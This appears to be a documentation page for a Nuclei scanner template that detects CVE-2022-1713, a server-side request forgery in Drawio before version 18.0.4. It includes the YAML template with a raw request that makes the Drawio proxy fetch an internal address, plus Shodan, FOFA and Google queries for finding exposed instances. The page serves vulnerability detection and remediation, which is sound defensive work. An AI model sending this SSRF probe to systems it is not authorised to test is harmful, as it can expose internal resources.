Skip to content
Nuclei Templates

Drawio <18.0.4 - Server-Side Request Forgery

ID: CVE-2022-1713

Severity: high

Author: pikpikcu

Tags: cve,cve2022,drawio,ssrf,oss,huntr,diagrams

Description

Section titled “Description”

Drawio prior to 18.0.4 is vulnerable to server-side request forgery. An attacker can make a request as the server and read its contents. This can lead to a leak of sensitive information.

YAML Source

Section titled “YAML Source”
id: CVE-2022-1713


info:
  name: Drawio <18.0.4 - Server-Side Request Forgery
  author: pikpikcu
  severity: high
  description: |
    Drawio prior to 18.0.4 is vulnerable to server-side request forgery. An attacker can make a request as the server and read its contents. This can lead to a leak of sensitive information.
  impact: |
    Successful exploitation of this vulnerability could result in unauthorized access to sensitive internal resources and potential data leakage.
  remediation: |
    Upgrade Drawio to version 18.0.4 or later to mitigate the SSRF vulnerability.
  reference:
    - https://huntr.dev/bounties/cad3902f-3afb-4ed2-abd0-9f96a248de11
    - https://github.com/jgraph/drawio/commit/283d41ec80ad410d68634245cf56114bc19331ee
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1713
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-1713
    cwe-id: CWE-918
    epss-score: 0.02483
    epss-percentile: 0.90072
    cpe: cpe:2.3:a:diagrams:drawio:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: diagrams
    product: drawio
    shodan-query:
      - http.title:"Flowchart Maker"
      - http.title:"flowchart maker"
    fofa-query: title="flowchart maker"
    google-query: intitle:"flowchart maker"
  tags: cve,cve2022,drawio,ssrf,oss,huntr,diagrams


http:
  - raw:
      - |
        GET /proxy?url=http%3a//0:8080/ HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<title>Flowchart Maker & Online Diagram Software</title>"


      - type: word
        part: header
        words:
          - "application/octet-stream"
# digest: 4b0a00483046022100f36dc9e8613d8ef97df8228b645a64a3ebd3e2c0432aaed981ec868d3e85683f022100f5161481c5b55bb5d38fd099a1ed93ac700856e1ed0865b1398d1a63bffb07ae:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-1713.yaml"

View on Github